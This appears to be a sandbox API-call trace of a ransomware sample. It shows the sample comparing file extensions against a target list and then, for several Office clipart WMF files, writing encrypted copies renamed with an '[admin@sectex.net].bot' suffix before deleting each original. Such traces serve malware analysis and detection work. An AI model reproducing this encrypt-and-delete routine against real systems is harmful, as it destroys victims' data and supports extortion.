	[0147.588] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.588] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.588] lstrlenW (lpString="HH00443_.WMF") returned 12
	[0147.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.601] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3298) returned 1
	[0147.601] CloseHandle (hObject=0x398) returned 1
	[0147.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf")) returned 0x20
	[0147.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.636] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.636] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.636] GetLastError () returned 0x0
	[0147.636] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xce2, lpOverlapped=0x0) returned 1
	[0147.709] WriteFile (in: hFile=0x2a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xcf0, lpOverlapped=0x0) returned 1
	[0147.710] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.710] WriteFile (in: hFile=0x2a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.710] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.711] CloseHandle (hObject=0x2a0) returned 1
	[0147.711] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.711] SetEndOfFile (hFile=0x3c4) returned 1
	[0147.713] CloseHandle (hObject=0x3c4) returned 1
	[0147.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.713] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf")) returned 1
	[0147.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.714] lstrlenW (lpString=".doc") returned 4
	[0147.714] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.714] lstrlenW (lpString=".docx") returned 5
	[0147.714] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.714] lstrlenW (lpString=".pdf") returned 4
	[0147.714] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.714] lstrlenW (lpString=".xls") returned 4
	[0147.714] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.714] lstrlenW (lpString=".xlsx") returned 5
	[0147.714] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.714] lstrlenW (lpString=".ppt") returned 4
	[0147.714] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.714] lstrlenW (lpString=".zip") returned 4
	[0147.714] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.714] lstrlenW (lpString=".rar") returned 4
	[0147.714] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.714] lstrlenW (lpString=".bz2") returned 4
	[0147.714] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.714] lstrlenW (lpString=".7z") returned 3
	[0147.714] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.714] lstrlenW (lpString=".dbf") returned 4
	[0147.714] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.714] lstrlenW (lpString=".1cd") returned 4
	[0147.714] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.715] lstrlenW (lpString=".jpg") returned 4
	[0147.715] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.715] lstrlenW (lpString=".doc") returned 4
	[0147.715] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.715] lstrlenW (lpString=".docx") returned 5
	[0147.715] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.715] lstrlenW (lpString=".pdf") returned 4
	[0147.715] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.715] lstrlenW (lpString=".xls") returned 4
	[0147.715] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.715] lstrlenW (lpString=".xlsx") returned 5
	[0147.715] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.715] lstrlenW (lpString=".ppt") returned 4
	[0147.715] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.715] lstrlenW (lpString=".zip") returned 4
	[0147.715] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.715] lstrlenW (lpString=".rar") returned 4
	[0147.715] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.715] lstrlenW (lpString=".bz2") returned 4
	[0147.715] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.715] lstrlenW (lpString=".7z") returned 3
	[0147.715] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.716] lstrlenW (lpString=".dbf") returned 4
	[0147.716] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.716] lstrlenW (lpString=".1cd") returned 4
	[0147.716] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63
	[0147.716] lstrlenW (lpString=".jpg") returned 4
	[0147.716] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.716] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.716] lstrlenW (lpString="HH00546_.WMF") returned 12
	[0147.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.813] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3718) returned 1
	[0147.813] CloseHandle (hObject=0x3a0) returned 1
	[0147.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf")) returned 0x20
	[0147.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.827] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.827] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0147.828] GetLastError () returned 0x0
	[0147.828] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xe86, lpOverlapped=0x0) returned 1
	[0147.830] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xe90, lpOverlapped=0x0) returned 1
	[0147.831] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.831] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.831] SetEndOfFile (hFile=0x3d0) returned 1
	[0147.831] CloseHandle (hObject=0x3d0) returned 1
	[0147.831] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.831] SetEndOfFile (hFile=0x1b8) returned 1
	[0147.833] CloseHandle (hObject=0x1b8) returned 1
	[0147.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.834] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00546_.wmf")) returned 1
	[0147.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.834] lstrlenW (lpString=".doc") returned 4
	[0147.834] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.834] lstrlenW (lpString=".docx") returned 5
	[0147.834] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.834] lstrlenW (lpString=".pdf") returned 4
	[0147.834] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.834] lstrlenW (lpString=".xls") returned 4
	[0147.834] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.835] lstrlenW (lpString=".xlsx") returned 5
	[0147.835] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.835] lstrlenW (lpString=".ppt") returned 4
	[0147.835] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.835] lstrlenW (lpString=".zip") returned 4
	[0147.835] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.835] lstrlenW (lpString=".rar") returned 4
	[0147.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString=".bz2") returned 4
	[0147.835] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString=".7z") returned 3
	[0147.835] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.835] lstrlenW (lpString=".dbf") returned 4
	[0147.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.835] lstrlenW (lpString=".1cd") returned 4
	[0147.835] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.835] lstrlenW (lpString=".jpg") returned 4
	[0147.835] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.835] lstrlenW (lpString=".doc") returned 4
	[0147.835] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString=".docx") returned 5
	[0147.835] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.835] lstrlenW (lpString=".pdf") returned 4
	[0147.835] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.835] lstrlenW (lpString=".xls") returned 4
	[0147.836] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.836] lstrlenW (lpString=".xlsx") returned 5
	[0147.836] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.836] lstrlenW (lpString=".ppt") returned 4
	[0147.836] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.836] lstrlenW (lpString=".zip") returned 4
	[0147.836] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.836] lstrlenW (lpString=".rar") returned 4
	[0147.836] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.836] lstrlenW (lpString=".bz2") returned 4
	[0147.836] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.836] lstrlenW (lpString=".7z") returned 3
	[0147.836] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.836] lstrlenW (lpString=".dbf") returned 4
	[0147.836] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.836] lstrlenW (lpString=".1cd") returned 4
	[0147.836] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 63
	[0147.836] lstrlenW (lpString=".jpg") returned 4
	[0147.836] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.836] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.836] lstrlenW (lpString="HH00601_.WMF") returned 12
	[0147.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.837] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1468) returned 1
	[0147.837] CloseHandle (hObject=0x1b8) returned 1
	[0147.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf")) returned 0x20
	[0147.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.837] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.838] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0147.838] GetLastError () returned 0x0
	[0147.838] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x5bc, lpOverlapped=0x0) returned 1
	[0147.841] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x5c0, lpOverlapped=0x0) returned 1
	[0147.842] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.842] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.842] SetEndOfFile (hFile=0x3d0) returned 1
	[0147.842] CloseHandle (hObject=0x3d0) returned 1
	[0147.842] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.842] SetEndOfFile (hFile=0x1b8) returned 1
	[0147.844] CloseHandle (hObject=0x1b8) returned 1
	[0147.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.844] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf")) returned 1
	[0147.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.845] lstrlenW (lpString=".doc") returned 4
	[0147.845] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.845] lstrlenW (lpString=".docx") returned 5
	[0147.845] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.845] lstrlenW (lpString=".pdf") returned 4
	[0147.845] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.845] lstrlenW (lpString=".xls") returned 4
	[0147.845] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.845] lstrlenW (lpString=".xlsx") returned 5
	[0147.845] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.845] lstrlenW (lpString=".ppt") returned 4
	[0147.845] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.845] lstrlenW (lpString=".zip") returned 4
	[0147.845] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.845] lstrlenW (lpString=".rar") returned 4
	[0147.845] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.845] lstrlenW (lpString=".bz2") returned 4
	[0147.845] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.845] lstrlenW (lpString=".7z") returned 3
	[0147.845] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.845] lstrlenW (lpString=".dbf") returned 4
	[0147.846] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.846] lstrlenW (lpString=".1cd") returned 4
	[0147.846] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.846] lstrlenW (lpString=".jpg") returned 4
	[0147.846] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.846] lstrlenW (lpString=".doc") returned 4
	[0147.846] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString=".docx") returned 5
	[0147.846] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.846] lstrlenW (lpString=".pdf") returned 4
	[0147.846] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString=".xls") returned 4
	[0147.846] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.846] lstrlenW (lpString=".xlsx") returned 5
	[0147.846] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.846] lstrlenW (lpString=".ppt") returned 4
	[0147.846] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.846] lstrlenW (lpString=".zip") returned 4
	[0147.846] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.846] lstrlenW (lpString=".rar") returned 4
	[0147.846] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString=".bz2") returned 4
	[0147.846] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.846] lstrlenW (lpString=".7z") returned 3
	[0147.847] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.847] lstrlenW (lpString=".dbf") returned 4
	[0147.847] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.847] lstrlenW (lpString=".1cd") returned 4
	[0147.847] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63
	[0147.847] lstrlenW (lpString=".jpg") returned 4
	[0147.847] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.847] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.847] lstrlenW (lpString="HH00602_.WMF") returned 12
